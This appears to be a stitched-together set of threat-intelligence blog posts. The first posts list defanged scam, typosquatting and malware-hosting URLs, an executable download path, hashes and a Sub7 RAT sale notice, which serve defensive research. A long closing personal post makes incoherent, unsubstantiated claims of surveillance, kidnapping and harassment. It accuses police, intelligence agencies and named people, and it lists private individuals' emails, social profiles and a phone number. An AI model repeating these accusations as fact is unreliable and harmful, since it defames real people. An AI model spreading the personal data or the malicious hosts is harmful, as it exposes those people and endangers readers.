"Your Shipping Panel LLC" is successfully positioning the company "Founded in 1995, is a package delivery company with services to Eastern Europe as well as to all the countries of the former Soviet Union. Over the years, Your Shipping Panel LLC has grown into an industry leader by focusing on the goal of connecting customers in the United States with their families, friends and businesses in Eastern Europe. This also includes e-commerce between those countries. Today, Your Shipping Panel LLC has become a dominant force in package delivery with services to Ukraine, Russia, Belarus, Moldova, Uzbekistan, Kazakhstan, Kyrgyzstan, Georgia, Azerbaijan and Armenia. Our specialized transportation and logistics services to those countries lead the way as the most recognized brand in North America."

Sample Screenshots of The Related Web Sites Known to Have Been Involved in the Campaign:

Related domains known to have participated in the campaign:

Stay tuned for an additional portfolio of re-shipping money mule recruitment scam domains to be published anytime soon.

Historical OSINT - Global Postal Express Re-Shipping Mule Recruitment Scam Spotted in the Wild (2019-02-07 10:51)

Continuing the series of posts detailing the activities of currently circulating malicious and fraudulent spam campaigns successfully targeting potential money mule recruiters, I’ve recently come across Global Postal Express, which basically states:

"We Provide best in service global logistics through our people by building lasting relationships with the commitment to prioritize our customer needs to generate financial results. Be the leader in the development of integrated logistics strategies by offering the highest levels of quality, reliability and exceptional customer service while strategically growing nationally and internationally."

Sample malicious URL known to have participated in the campaign:

hxxp://globalpostalexpress.net - Email: globalpostalexpressinc@gmail.com

Sample Mailing Address:

2549 Harris Ave, Sacramento,CA 95838, U.S.A

+1 (719) 838 2416

Sample Screenshots of the Service in Action:

Sample Screenshots of the Related Malicious Domains Known to Have Participated in the Campaign:

Related malicious URLs known to have participated in the campaign:

hxxp://www.marannata.com

hxxp://wellburton.com

hxxp://stecoexpress.com

hxxp://mag-trading.com

Stay tuned for an additional set of details regarding re-shipping money mule recruitment domain portfolios anytime soon.

Historical OSINT - Able Express Courier Service Re-Shipping Mule Recruitment Scam Spotted in the Wild (2019-02-07 12:14)

I’ve recently intercepted a currently circulating malicious and fraudulent spam campaign successfully impersonating "Able Express Courier Service" to utilize a re-shipping mule recruitment scam potentially targeting tens of thousands of unsuspecting users globally.

Sample malicious URL known to have participated in the campaign:

hxxp://ablecs.biz - 104.31.82.184 - Email: phyllisjhurst@grr.la

Sample Mailing Address:

PO Box 34459

Bartlett, TN 38184-0459

United States

+1 (888) 597-5808

The service is positioning itself as "Able Express Courier Service has been providing forwarding services for more than three years now. Our staff consists of experienced professionals who regularly get certified and verified for competency. Over the years, Test Compant inc has delivered packages to a variety of places and gained many major business partners all around the world."

Sample Screenshots of the Malicious and Fraudulent Service:

Stay tuned for an additional set of details regarding re-shipping money mule recruitment scams to be published anytime soon.

Historical OSINT - Profiling a Typosquatted Facebook and Twitter Impersonating Fraudulent and Malicious Domains Portfolio (2019-02-07 15:47)

With cybercriminals continuing to populate the cybercrime ecosystem with hundreds of malicious releases including a variety of typosquatted domains it shouldn’t be surprising that hundreds of thousands of users continue falling victim to fraudulent and malicious malware and exploits serving schemes.

In this post I’ll profile a currently active fraudulent and malicious typosquatted domain portfolio successfully

impersonating Facebook and Twitter for the purpose of enticing users into interacting with the rogue and malicious

domains.

Related domains known to have participated in the campaign:


hxxp://unrated-gallery-1.info

hxxp://unrated-gallery-10.info

hxxp://unrated-gallery-2.info

hxxp://unrated-gallery-3.info

hxxp://unrated-gallery-4.info

hxxp://unrated-gallery-5.info

hxxp://unrated-gallery-6.info

hxxp://unrated-gallery-7.info

hxxp://unrated-gallery-8.info

hxxp://unrated-gallery-9.info

hxxp://profile-unrated-1.info

hxxp://profile-unrated-10.info

hxxp://profile-unrated-2.info

hxxp://profile-unrated-3.info

hxxp://profile-unrated-4.info

hxxp://profile-unrated-5.info

hxxp://profile-unrated-6.info

hxxp://profile-unrated-7.info

436

hxxp://profile-unrated-8.info

hxxp://profile-unrated-9.info

hxxp://iprosa.com

hxxp://sm-urls.com

hxxp://snkirl.com

hxxp://tnulk.com

hxxp://smulx.com

hxxp://tnysnorl.com

hxxp://supalnk.com

hxxp://tnyweb.com

hxxp://smlnk.com

hxxp://profilehoster.com

hxxp://make-small.com

hxxp://my-link-out.com

hxxp://url-out.com

hxxp://profile-out.com

hxxp://tiny-out.com

hxxp://posta-link.com

hxxp://coool-pics.com

hxxp://twitpics-1.com

hxxp://twitpics-4.com

hxxp://twitpics-2.com

hxxp://twitpics-3.com

hxxp://profile-video-gallery.com

hxxp://fb-photo-gallery.com

hxxp://fb-gallery.com

hxxp://profile-photo-gallery.com

hxxp://profilegallerysite.com

hxxp://profilepicturesite.com

hxxp://my-profile-gallery.com

hxxp://profile-gallery.com

hxxp://profile-galleries.com

hxxp://her-profile-pictures.com

hxxp://her-picture-sites.com

hxxp://her-photo-site.com

hxxp://gallery-link.com

hxxp://her-photo-sites.com

hxxp://her-profile-photos.com

hxxp://her-profile-out.com

hxxp://her-profiles.com

hxxp://her-picture-site.com

hxxp://photosites-now.com

hxxp://photos-for-fb.com

hxxp://photosforfb.com

hxxp://photo-galleries-onilne.com

Stay tuned for an updated set of typosquatted malicious and fraudulent domains impersonating popular brands to

be published anytime soon.


Historical OSINT - Profiling a Rogue and Malicious Domain Portfolio of OEM-Pirated Software

(2019-02-07 17:27)

In a cybercrime ecosystem dominated by fraudulent and malicious releases, cybercriminals continue to rely on fraudulent and potentially malicious affiliate-based revenue-sharing schemes to serve fraudulent and malicious software to thousands of unsuspecting users, including OEM-powered pirated software to millions of users globally.

In this post I’ll profile a currently active portfolio of fraudulent and malicious domains serving OEM-powered pirated software.

Related domains known to have participated in the campaign:

With software piracy continuing to increase and proliferate, it shouldn’t be surprising that rogue and fraudulent affiliate-based networks will continue to make an impact globally, potentially exposing millions of users to a variety of risks including malicious software.

Stay tuned for an updated set of fraudulent and malicious piracy-themed portfolio of domains to be published

anytime soon.

Historical OSINT - A Peek Inside The Georgia Government’s Web Site Compromise Malware Serving Campaign - 2010 (2019-02-07 17:30)

Remember the massive [1]Russia vs Georgia cyber attack circa 2009? It seems that the time has come for me to dig a little bit deeper and provide [2]actionable intelligence on one of the actors that seems to have participated in the campaign, including a sample Pro-Georgian type of Cyber Militia that apparently attempted to "risk-forward" the responsibility for waging Cyberwar to third-parties including Russian and Anti-Georgia supporters.

How come? In this post I’ll provide actionable intelligence on what appears to be a currently active Brazilian supporter of the Cyber Attacks that took place circa 2009 with the idea to discuss in-depth the tools and motivation for launching the campaign of the cybercriminals behind it.

Sample malicious URL known to have participated in the campaign:

hxxp://geocities.ws/thezart/

It’s 2010 and I’m coming across a malicious and fraudulent file repository that can be best described as a key actor that managed to participate in, perhaps even orchestrate, the Russia vs Georgia cyber attacks circa 2009. Who is this individual? How did he manage to contribute to the Russia vs Georgia cyber attacks? Did he rely on active outsourcing or was he hired to perform the orchestrated DDoS for hire attacks that took place back then? Keep reading.

It appears that a Brazilian user known as The Zart managed to participate in the Russia vs Georgia cyber attacks circa 2009 relying on a variety of tools and techniques known as:

- DNS Amplification Attacks

- Web Site Defacement Tools

- Targeted Spreading of Vulnerable Legitimate Web Sites

- Automated Web-Site Exploitation - Long Tail of The Malicious Web

which basically resulted in a self-mobilized militia that actually participated and launched the Russia vs Georgia cyber attacks circa 2009.

Related posts:

[3]The Russia vs Georgia Cyber Attack

[4]Who’s Behind the Georgia Cyber Attacks?

[5]DDoS Attack Graphs from Russia vs Georgia’s Cyberattacks

[6]Real-Time OSINT vs Historical OSINT in Russia/Georgia Cyberattacks

1. http://georgiaupdate.gov.ge/doc/10006922/CYBERWAR-%20fd_2_.pdf

2. http://blog.sucuri.net/2010/02/georgia-government-sites-hacked-and.html

3. https://ddanchev.blogspot.com/2008/08/the-russia-vs-georgia-cyber-attack.html

4. https://ddanchev.blogspot.com/2008/08/who-behind-georgia-cyber-attacks.html

5. https://ddanchev.blogspot.com/2008/10/ddos-attack-graphs-from-russia-vs.html

6. https://ddanchev.blogspot.com/2008/10/real-time-osint-vs-historical-osint-in.html

Historical OSINT - Profiling a Portfolio of Fake Visa Application Scam Domains (2019-02-07 17:56)

It’s been a while since I last posted a quality update profiling a versatile, currently circulating malicious and fraudulent spam campaign and highlighting the fraudulent and malicious activities of the cybercriminals behind the campaign.

In this post I’ll profile a currently circulating Fake Visa Application fraudulent campaign enticing users into submitting their personal details for the purpose of obtaining a fake and rogue visa.

Related emails known to have participated in the campaign:

Stay tuned for an updated set of malicious and fraudulent Fake Visa Application domain portfolio to be published anytime soon.

Historical OSINT - Sub7 Crew Releases New Version on 11th Anniversary of The RAT (2019-02-07 18:03)

It’s 2010 and I’ve recently come across the following announcement at Sub7’s Main Forum - the most ubiquitous trojan horse also known as Remote Access Tool circa the 90’s - on the upcoming release of a new version.

" People can buy unique FUD servers in the shop and custom clients can also be written to help you admin PC’s

remotely with your own features. These are selling well so be sure to grab your own custom version while we are

offering them at this price. Please be advised there is currently a waiting list for this. "

Sample detection rate:

- [1]borlndmm.dll - Result: 0/42 (0 %)

- [2]EditServer.exe - Result: 10/42 (23.81 %)

- [3]Server.exe - Result: 18/41 (43.91 %)

- [4]SubSeven.exe - Result: 16/41 (39.03 %)

Should The Scene the way we know it re-appear the way we know it? It appears that every now and then a new cybercrime-friendly tool is trying to materialize taking us back to what used to be The Scene circa the 90’s.

1. https://www.virustotal.com/bg/file/23b0241109dea46fcd433d25a48e41f95cf2d7ea589f72f4e2948706de3e0657/analysis/

2. https://www.virustotal.com/bg/file/35e843125f2ef10925c856a0a39000a8df368fb8499cd0d47d12b5de728a222c/analysis/

3. https://www.virustotal.com/bg/file/2ba3217268b2d737a542e7b7840a4480c655b2b9414d4c57e8b1c8bfa76322c8/analysis/

4. https://www.virustotal.com/bg/file/0d0d9ba70ab502cd1a61d0913ae9e9853131079e22881a2f527bf699029824ad/analysis/

Historical OSINT - "I Know Who DDoS-ed Georgia and Bobbear.co.uk Last Summer" (2019-02-07 20:30)

Appreciate my rhetoric. In this post I’ll provide actionable intelligence on a key DDoS for hire service that was primarily used in the [1]Russia vs Georgia Cyber Attacks circa 2009 including the [2]DDoS attack against Bobbear.co.uk.

Related actionable intelligence on the campaign:

hxxp://setx.in - Email: info@antiddos.eu - setx.mail@gmail.com - hxxp://httpdoc.info - hxxp://fakamaza.info. The

last one with the email address "team@russia-vs-georgia.org" in the WHOIS info.

Related malicious URLs known to have participated in the campaign:

hxxp://cxim.inattack.ru/www7/www/auth.php

Related malicious URLs known to have participated in the campaign:

hxxp://h278666y.net/main/load.exe

hxxp://h278666y.net/www/auth.php

Related malicious MD5s known to have participated in the campaign:

MD5: 34413180d372a9e66d0d59baf0244b8f

MD5: 42e4bbd47d322ec563c86c636c3f10b9

MD5: ed36b42fac65236a868e707ee540c015

MD5: c9fa1c95ab4ec1c1d46abe5445fb41e4

hxxp://cxim.inattack.ru/www3/www/

hxxp://i.clusteron.ru/bstatus.php

Related malicious URLs known to have participated in the campaign:

hxxp://svdrom.cn

Related malicious URLs known to have participated in the campaign:

hxxp://203.117.111.52/www7/www/getcfg.php

Related malicious domains known to have participated in the campaign:

1. https://ddanchev.blogspot.com/2019/02/historical-osint-peek-inside-georgia.html

2. https://ddanchev.blogspot.com/2008/11/the-ddos-attack-against-bobbearcouk.html

Announcing Offensive Warfare 2.0 - Official Hacking and Security Community Launch (2019-03-22 15:14)

Dear blog readers, I wanted to let everyone know that I’ve recently launched a public [1]hacking and cyber security

community repository offering Security Directory Downloads Podcasts and Security Videos directory including a

countless number of hacking and security resources including a possible hacking and security discussion including

community-based services and products - to keep the spirit of the Scene and the Security Industry - the way we know it.

How to obtain access?

- consider approaching me at dancho.danchev@hush.com for the purpose of requesting an invite

How you can contribute?

- feel free to approach your colleagues and friends including social network in terms of spreading the word about the

portal and the community

- consider registering making an introduction and starting to contribute with content

- approach me directly at - dancho.danchev@hush.com with your questions and possible feature and content

suggestion

Looking forward to receiving your response including any additional questions or comments including suggestions that you might have in terms of the project.

Stay tuned!

1. https://www.offensive-warfare.com/login/

April

Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two (2019-04-04 05:51)

[1]

UPDATE: I can be reached at dancho.danchev@hush.com or at +359 87 68 93 890 in case of an emergency.

UPDATE: It appears that recently a car belonging to local police department (hxxp://troyan-police.com; police_troyan@abv.bg) was stopped somewhere around my place with the lights turned on with the idea to provoke a possible local police visit.

UPDATE: It appears that my place was visited for a second time by local police officers (hxxp://troyan-police.com; police_troyan@abv.bg) with third-party doctors (http://mbal-troyan.com; mbal_troyan@abv.bg) for the purpose of apparently injecting me and a document for the injection was signed by someone that I know.

UPDATE: It appears that someone managed to twist my arm and therefore pressed a pressure on my eye

without my knowledge with random people attempting to communicate with me behind a wall.

UPDATE: It appears that prior to my presentation at InfoSec 2012 someone managed to place a plaque on the

wall in Earl’s Court and therefore I experienced a pressure on my head while making a presentation.

UPDATE: It appears that prior to my presentation visit in Lyon in 2010 someone managed to wound my mouth with

something that can be described as wall interference.

UPDATE: It appears that someone managed to open my eye and therefore I’m currently experiencing a pressure behind a wall with random people attempting to communicate with me.

UPDATE: It appears that I’m currently persistently experiencing a pressure on my mouth including something

in the lines of a toxic chemical on my nose.

UPDATE: It appears that someone managed to map my place including my head and body using rubber and is

persistently trying to communicate with me.

UPDATE: In case you’re interested in contacting me in terms of my law enforcement issues and potential kidnapping and harassment attempts including possible interview requests - feel free to approach me at dancho.danchev@hush.com as I’m currently busy looking for a full time cybercrime researcher security blogger and threat intelligence analyst type of position.

I would be also definitely looking forward to sharing some of my sensitive projects including related work in

various other sensitive areas with the idea to end the ongoing IP (Intellectual Property) robbery courtesy of a variety

of industry-leading companies and individuals. [2]Has the time come to work hard and set them straight? It appears

so. Feel free to approach me at dancho.danchev@hush.com

You can use the following PGP key to approach me regarding possible [3]career opportunities regarding possible

involvement in related sensitive projects at dancho.danchev@hush.com or just to say hi request [4]Threat Data

access including a sample or a possible trial or make a comment regarding my current and [5]historical OSINT

research including possible references to my 2010 disappearance including various cybercrime underground chatter

referencing me and my research including disappearance and possible kidnapping including possible GCHQ Lovely

Horse references and related resources and comments.

Sample Information Security and Information Warfare cartoon circa 2008:

Second Sample Information Security and Information Warfare cartoon circa 2008:

UPDATE: It appears that someone managed to somehow place a basketball ball on my head chin and eye and

therefore I’m currently experiencing a pressure on my eye and my face with people attempting to communicate with

me.

UPDATE: It appears that someone is attempting to communicate with me using pressure pressed on my stomach.

UPDATE: It appears that someone is pressing a doll on a wall and is attempting to communicate with me including an increased pressure in my place.

UPDATE: It appears that different people are attempting to communicate with me behind a wall using a basketball ball interfering with the pressure in my place.

UPDATE: It appears that the robot has been persistently sprayed with homo-sexual spray including a possible

female spray leading to a persistent harassment and torture currently affecting my life-being work-relationships and

intellectual property.

UPDATE: It appears that someone managed to place a box on the top of the robot for a period of several years successfully blinding me and restraining me from remote work activity.

In a related news story regarding my experience and expertise in the field it appears that the GCHQ has been actively

monitoring me on Twitter including active traffic monitoring in a 2012 Intelligence Community program labeled -

[6]Lovely Horse that’s basically a Palantir implementation of [7]OSINT practices regarding a certain Twitter account.

The purpose? Active traffic and [8]content monitoring for the purpose of robbing me out of sensitive research and

related research data which leads me to believe that I’ve been successfully contributing to a massive treasure trove

IP (Intellectual Property) theft and robbery courtesy of the GCHQ and the NSA for a significant period of time.

- [9]Western Spy Agencies Secretly Rely on Hackers for Intel and Expertise

- [10]LOVELY HORSE: GCHQ Program Monitored Hacker/InfoSec Community on Social Media

- [11]GCHQ’s ’Lovely Horse’ tool helped spooks monitor hackers online

- [12]GCHQ created ’Lovely Horse’ to keep track of top hackers’ and security specialists’ blogs and tweets

- [13]Spy Agencies Rely on Hackers for Stolen Data and Monitoring Security Experts for Expertise

- [14]GCHQ Create Their Own Tweetdeck To Track People of Interest

- [15]GCHQ siphoned off info stolen by hackers for its own ends

- [16]Some hackers are unknowingly gathering intel for the NSA

It’s also becoming increasingly evident that I’m also a participant in several other Intelligence Community Programs that appear to have successfully attempted to rob and steal my "know-how" leading me to pursue a possible closed-community data and research sharing or to request invite-only access to related research and data. Remember [17]HBGary? It appears that every now and then a security company tries to re-position the industry by offering targeted and proprietary Threat Intelligence to a variety of sources successfully undermining a variety of community-offered and presented actionable Threat Intelligence.

While it’s an honor to receive a competing proposition it should be noted that the majority of my research is public excluding several community-driven sensitive projects that I spend my time working on. It appears that the time has come for me to take my research to a whole new level which led me to pursue my own career path within the Intelligence Community by successfully launching [18]Disruptive Individuals including the [19]Obmonix - Cybercrime and Cyber Jihad Fighting Platform including the eventual launch of the invite-only [20]Threat Data - The World’s Most Comprehensive Threat Database including a possible [21]career opportunity with the industry-leading Webroot including a short-term venture with [22]GroupSense including a possible [23]SCMagazine 2011 nomination for my Twitter activity including the [24]upcoming launch of Astalavista Security Group 2.0 - my primary working location throughout the 90’s with a currently active crowdfunding campaign.

While I continue to be a firm believer that sharing and communicating actionable Threat Intelligence to a variety of sources is the appropriate way to proceed and process a variety of cybercrime-related campaigns and malicious activity I believe that the time has come for me to take my research to a whole new level prompting me to seek a new career opportunity as the [25]World’s leading cybercrime researcher security blogger and threat intelligence analyst.

The majority of sources referenced in the original research basically represent the majority of [26]my RSS feeds

circa 2006 and it’s becoming increasingly interesting perhaps even funny to figure out that the majority of my

[27]OSINT techniques including active WHOIS monitoring and research are widely accepted and discussed within

the Intelligence Community.

What prompted the GCHQ to issue an active traffic and Twitter account monitoring campaign? Keep reading - back in the day throughout the period of 2008-2013 I used to actively monitor and profile various high-profile nation-state malicious and fraudulent campaigns including the [28]infamous Koobface botnet – listen to the [29]original MP3 interview – which I extensively [30]profiled and managed to practically take down including the [31]active exposing of its core [32]botnet master including the active exposure of client-side exploits being served through the [33]Koobface botnet through what appears to be [34]a partnership between the Koobface botnet master and a well known cybercriminal - Exmanoize a well known author of a well known Web malware exploitation kit including the receiving of malware-infected host embedded messages in response to my "[35]10 things you didn’t know about the Koobface gang" including [36]what appears to be a [37]direct redirection of Facebook to my personal blog including yet [38]another message left by the [39]Koobface gang, including a variety of [40]typosquatted C&C server domains registered to my name [41]including extensive [42]Russian Business Network coverage at the time.

Sample Koobface Botnet Infographic courtesy of CyberCamp 2016:

It’s also worth mentioning that at the time the [43]U.S Treasury Department was also redirecting to my Blogger

profile [44]including the active HOST file modification courtesy of a well known money-mule recruitment campaign.

Consider going through the following set of resources and news articles throughout 2008-2013 which can best

describe the Threat Intelligence Scene the way I know it and the way I’m positive it should be.

Research and News Articles covering my research and referencing me throughout - 2008:

• [45]Russian hacker ’militia’ mobilizes to attack Georgia

• [46]Fraudsters Target Facebook With Phishing Scam

• [47]Fake Microsoft e-mail contains Trojan virus

• [48]Hackers expand massive IFRAME attack to prime sites

• [49]Hackers infiltrate Google searches

• [50]Hackers expand massive IFrame attack to prime sites

• [51]Hackers knocked Comcast.net offline

• [52]Adobe investigates Flash Player attacks

• [53]High-tech bank robbers phone it in

• [54]Attackers booby-trap searches at top Web sites

• [55]Carpet bombing networks in cyberspace

• [56]Storm worm e-mail says U.S. attacked Iran

• [57]India’s underground CAPTCHA-breaking economy

• [58]Domain Name Record Altered to Hack Comcast.net

• [59]Google searchers could end up with a new type of bug

• [60]Ongoing IFrame attack proving difficult to kill

• [61]Hackers expand massive IFRAME attack to prime sites

• [62]Danchev: The small pack Web malware exploitation kit

• [63]Danchev: Massive SQL injection the Chinese way

• [64]CAPTCHAs are dead - new research from Dancho Danchev confirms it

• [65]Hackers infiltrate Google searches

• [66]Massive faux-CNN spam blitz uses legit sites to deliver fake Flash

• [67]Faked CNN spam blitz pushes fake Flash

• [68]Danchev: Anti-fraud site DDOS attack

• [69]Sony PlayStation site victim of SQL-injection attack

• [70]Fake CNN Alert Still Spreading Malware

• [71]Look Ma, I’m on CIA.gov

Research and News Articles covering my research and referencing me throughout - 2009:

• [72]Green Dam exploit in the wild

• [73]“In gaz we trust”: a fake Russian energy company facilitating cybercrime

• [74]Don’t pay your ransom via SMS

• [75]NYT scareware scam linked to click fraud botnet

• [76]Danchev: A crimeware developer’s to-do list

• [77]Danchev rained on my scareware campaign

• [78]Is “aggregate-and-forget” the future of cyber-extortion?

• [79]NYT scareware scam linked to click fraud botnet

• [80]Microsoft declares war on ’scareware’

• [81]Don’t pay your ransom via SMS

• [82]Twitter warms up malware filter

• [83]What’s really the safest Web Browser?

• [84]With Unrest in Iran, Cyber-attacks Begin

• [85]Zeus bot found using Amazon’s EC2 as C&C server

Research and News Articles covering my research and referencing me throughout - 2010:

• [86]Firefox add-on encrypts sessions with Facebook, Twitter

• [87]Watch out for malware with those pretty Mac screensavers

• [88]Months-old Skype vulnerability exploited in the wild

• [89]Danchev: Money mule recruiters

• [90]Cybercrime’s bulletproof hosting exposed

• [91]Malware Threatens to Sue BitTorrent Downloaders

• [92]Firefox add-on encrypts sessions with Facebook, Twitter

• [93]Chuck Norris Botnet Karate-chops Routers Hard

Research and News Articles covering my research and referencing me throughout - 2011:

• [94]Kaspersky disputes McAfee’s Shady Rat report

• [95]Has EV-SSL Growth Been Slow?

• [96]Report: Vishing Attack Targets Skype Users

Research and News Articles covering my research and referencing me throughout - 2012:

• [97]Fake UPS notices deliver malware

• [98]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email

• [99]New Skype malware threat reported: Poison Ivy

• [100]Five Koobface botnet suspects named by New York Times
• [101]Virtual jihad: How real is the threat?

• [102]Is the death knell sounding for traditional antivirus?

• [103]Can the Nuclear exploit kit dethrone Blackhole?

• [104]Experts split over regulation for bounty-hunting bug sniffers

• [105]Spammers Using Fake YouTube Notifications to Peddle Drugs

• [106]Adele Bests Adderall As Affiliate Spammers Offer Music Downloads

• [107]Bulgarian sleuth unveils botnet operators

• [108]Fake PayPal Emails Distributing Malware

• [109]Web Gang Operating in the Open

• [110]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email

• [111]Buy 500 hacked Twitter accounts for less than a pint

• [112]NBC.com Hacked, Infected With Citadel Trojan

Research and News Articles covering my research and referencing me throughout - 2013:

• [113]How Much Does A Botnet Cost?

• [114]Automated YouTube account generator offered to cyber crooks

• [115]Upgraded Modular Malware Platform Released in Black Market

• [116]Deconstructing the Al-Qassam Cyber Fighters Assault on US Banks

• [117]NBC hack infects visitors in ’drive by’ cyberattack

• [118]Bitcoins are being traded for hack tools

• [119]New DIY Google Dorks Based Hacking Tool Released

• [120]Hacking The TDoS Attack

• [121]Mass website hacking tool alerts to dangers of Google dorks

• [122]Cybercrime service automates creation of fake scanned IDs

• [123]Spammers unleash DIY phone number slurping web tool

• [124]Spam email contains malware, not Apple gift card

• [125]APT1, that scary cyber-Cold War gang: Not even China’s best

• [126]Mass website hacking tool alerts to dangers of Google dorks

• [127]C&C PHP script for staging DDoS attacks sold on underground forums

• [128]Russian Malware-as-a-Service Offers Up Server Rentals for $240 a Pop

• [129]Java exploit kit sells for $40 per day
• [130]Buggy DIY botnet tool leaks in black market

• [131]New DIY Google Dorks Based Hacking Tool Released

• [132]Botnets for rent, criminal services sold in the underground market

• [133]Spam email contains malware, not Apple gift card

UPDATE: It appears that someone placed a remote robot at local police department capable of recording my life

including my life-being leading to a ruined career work relationships and intellectual property.

UPDATE: It appears that an unknown group of people is attempting to communicate with me using a transmitter on

my mouth using plastic paper in their mouth.

UPDATE: It appears that someone is permanently trying to hide my eyes using plastic paper apparently using

a transmitter that’s been apparently placed on my mouth. It also appears that the person behind the transperant is

attempting to move closely thereby ruining my equipment and life-being.

UPDATE: It appears that the transperant is operated by someone relying on lenses including bottles to map and

touch-point related activities of an individual in place following persistent harassment and life-being manipulation.

In a related news article - "[134]ZDNet Security Blogger Goes Missing in Bulgaria" covering my disappearance I came across a juicy comment referencing the work of a well-known artist which leads me to research a little bit further

leading me to the following CD/Vinyl label - "Blue Sabbath Black Cheer / Griefer – We Hate You / Dancho Danchev

Suck My Dick" courtesy of the following individual.
Take into consideration the following brief post regarding the associated individual:

" It’s 2010 and I’m stumbling upon a defaced image of my head shot (circa 2006). I never actually bothered

about what others say, even when they insist that I’m maliciously enjoying the fact that I profile, expose, and disrupt

cybercrime campaigns when there’s no time for enjoyment, as the stakes are too high.

The defaced headshot is part of the released back in 2010 album "We Hate You/Dancho Danchev S*ck my

D*ck" by the Blue Sabbath Griefer group.
So who’s behind this "black PR" campaign? Who’s the mysterious Photoshop-er? It’s a [135]Canadian music artist

called [136]Ron Brogden, who spends his spare time coding for hire, when he’s not photoshoping my headshots.

Hatred-friendly domain name reconnaissance:

deterrent.net - 95.142.172.70 - Email: slave@codegrunt.com

Domain owner: Ron Brogden, Secondary email: moron@industrial.org


Responding to the same IP are also the following domains operated by Ron:

codegrunt.com

deterrent.net

industrial.org

nuckflix.com"
In terms of my 2010 disappearance I also recently came across the following [137]screenshots courtesy of the

cybercrime-friendly forum Darkode courtesy of an individual known as Xylitol discussing my disappearance including

a possible Hitman Request charging at $10,000. Unfortunately, the screenshots were taken using the name of Nassef

with whom Xylitol shared his accounting details with me including the taking of the screenshots.
UPDATE: It appears that my 2010’s disappearance is slowly turning into a modest [138]kidnapping attempt on behalf of Bulgarian law enforcement in constitution with DANS (State Agency for National Security) who appear to have

been operating a long-turn operation to ruin my reputation intellectual property and work relationships successfully

holding me a hostage for a period of seven years following a long-run kidnapping and harassment attempts leading

to a ruined career intellectual property violation and work relationships.

Operating a remotely-operated gas pump with asbestos targeted at my place Bulgarian law enforcement in constitution

with DANS (State Agency for National Security) appear to have successfully tracked down and manipulated

my life-being following a successful set of long-run kidnapping and harassment attempts leading to a successfully

ruined career intellectual property violation and work relationships.

It appears that Bulgarian law enforcement in constitution with DANS (State Agency for National Security) have

placed remote stickers on my place and have managed to successfully map my place leading to a successful illegal
entry courtesy of an unknown person followed by another unknown person supposedly a colleague followed by

an illegal entry courtesy of unknown police officers who took my ID and escorted me to a local institution without

explaining the reason for holding me hostage there.

It appears that the group is operating a transperant using feelings to map and touch point related activities of

the individuals in place following a successful kidnapping and harassment attempt leading to illegal entry and

possible kidnapping attempt. It appears that Bulgarian law enforcement in constitution with DANS (State Agency

for National Security) have managed to place a plastic sticker in my mouth leading to a successful monitoring and

tracking including the use of a transperant leading to a successful kidnapping and harassment attempt leading to a

ruined career intellectual property violation and work relationships.

UPDATE: [139]Great News: Missing Cybersecurity Expert Dancho Danchev Is No Longer Missing, [140]We

need help with the strange disappearance of Dancho Danchev, [141]Security Researcher, Cybercrime Foe Goes

Missing, [142]Dancho Danchev: Missing cybersecurity expert, [143]Cybercrime Blogger Vanishes After Finding

Tracking Device In His Bathroom, [144]Zero Day blogger Dancho Danchev: he’s back, [145]The Strange Disappearance

of Dancho Danchev, [146]We need help with the strange disappearance of Dancho Danchev, [147]Mystery

Surrounds Cyber Security Blogger Dancho Danchev’s Whereabouts, [148]Update on Dancho Danchev, [149]ZDNet

Security Blogger Mysteriously Disappears, [150]ZDNet Blogger Disappears Mysteriously In Bulgaria, [151]ZDNet

Blogger Disappears Under Mysterious Circumstances

UPDATE: Prior to my stay in another town I was contacted by Riva Richmond (riva@rivarichmond.com) and set up a meeting to discuss a potential New York Times article.

UPDATE: Prior to my stay at this particular apartment I contacted Nart Villeneuve (n.villeneuve@secdev.ca) seeking assistance signaling potential trouble.

UPDATE: Prior to my stay at a local institution (dpblovech@abv.bg) for a period of three months the same person Kamen Kovachev (Kamen Tzura) (tsyrov@abv.bg) was released by another person known as Nesho Sheygunov (https://www.facebook.com/nesho.sheygunov).

UPDATE: During my stay at a local institution (dpblovech@abv.bg) for a period of three months another person that I know Kamen Kovachev (Kamen Tzura) (tsyrov@abv.bg) was taken to the room where I was confined and I spent a night in the corridor.

UPDATE: While I was taken to a local institution (dpblovech@abv.bg) for a period of three months I had my phone taken and I was confined.

UPDATE: While I was taken out of my place to an unknown car the fuel was charged to someone that I know.

UPDATE: Prior to my stay at a local institution (dpblovech@abv.bg) I was offered to take vitamins.

UPDATE: My place was recently visited by unknown men taking me to local police department (hxxp://troyan-police.com; police_troyan@abv.bg) and asking me to write that my equipment was interfering with that of local police department.

UPDATE: It appears that someone has taken the time and effort to take a t-shirt of mine.

UPDATE: Prior to my visit at a local hotel (hxxp://central-hotel.com/en; central@central-hotel.com) some of my clothes were missing.

UPDATE: It appears that my place was recently supposedly visited by Plamen Dakov (hxxp://universalstroi.com), Hristo Radionov (hxxp://universalstroi.com; hxxp://www.facebook.com/hristo.radionov), and Ivailo Dochkov (hxxp://www.facebook.com/ivodivo), who left money for me.

UPDATE: Prior to my attendance in a local institution (dpblovech@abv.bg) Ivailo Dochkov (hxxp://www.facebook.com/ivodivo) tried to meet me.

UPDATE: Prior to my attendance at this particular apartment I was invited by Briana Papa (Briana@crenshawcomm.com) to visit Prague on behalf of Avast! Software where I met with Vince Steckler (steckler@avast.com) and Miloslav Korenko (korenko@avast.com) where I met with Lucian Constantin (hxxp://twitter.com/lconstantin).

Prior to my attendance at this apartment I was also invited to another event held at INTERPOL by Steve Santorelli (steve.santorelli@gmail.com) which I successfully attended and presented at where I also met with Krassimir Tzvetanov (krassi@krassi.biz).

Something else worth pointing out is that my place is visited by an unknown woman known as Boriana Mihovska, an unknown man known as Leonid, an unknown person known as Tzvetan Georgiev (hxxp://www.youtube.com/user/laron640; tzvetan.leonid@gmail.com); (hxxp://plus.google.com/107108766077365473231), and an unknown person known as Dobrin Danchev (hxxp://www.facebook.com/dobrin.danchev); (hxxp://www.sibir.bg/parachut), and another unknown person known as Ina Dancheva (http://otkrovenia.com/bg/profile/innadancheva).

The most recent visit to my place was by a person known as Vasil Stanev from DANS (dans@dans.bg) who was supposedly asking me to take a job and consequently asked me to attend a doctor session.

Dear blog readers, I feel it’s about time I post an honest response regarding my [152]disappearance in [153]2010 with the [154]purpose of [155]informing my [156]readers on my [157]current situation and [158]to continue [159]posting and contributing valuable threat intelligence to the security community.

